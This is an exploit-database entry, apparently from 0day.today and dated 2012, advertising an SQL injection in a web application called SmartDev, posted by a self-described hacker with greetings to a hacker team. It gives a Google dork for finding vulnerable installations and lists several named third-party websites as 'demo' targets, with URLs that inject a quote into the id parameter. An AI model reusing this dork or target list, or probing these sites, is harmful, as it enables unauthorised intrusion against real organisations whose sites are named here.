id: 18080
date: 04/19/2012
title: SmartDev SQL Injection Vulnerability
author: b0y h4ck3r
cves: 

# Exploit Title: SmartDev sql injection
# Date: 19-4-2012
# Author: b0y h4ck3r
# facebook: http://www.facebook.com/profile.php?id=100003581373402
# Version: there is not more than 1 version :p
# Category: webapps
# Google dork: inurl:content_fr.php?id=
# Tested on: windows7
# Demo site:
http://www.allrenobecam.be/m/content_fr.php?id=2%27
http://m.ter-faem.be/content_fr.php?id=2%27
http://www.fclm.ca/content_fr.php?id=29%27
http://www.horizon-furniture.com/content_fr.php?id=22%27
http://www.squash.be/content/content_fr.php?id=448%27
http://www.sodexoeducation.be/content_fr.php?id=153%27
http://www.basementsystemsquebec.com/content_fr.php?id=19%27
and many more in google ;)
#gr33tz to all muslimz and all memberz of  gaza hacker team gaza-hacker.net
[ MR.TOPS - hamdix - casper - and all ;) ]



#  0day.today [2023-03-24]  #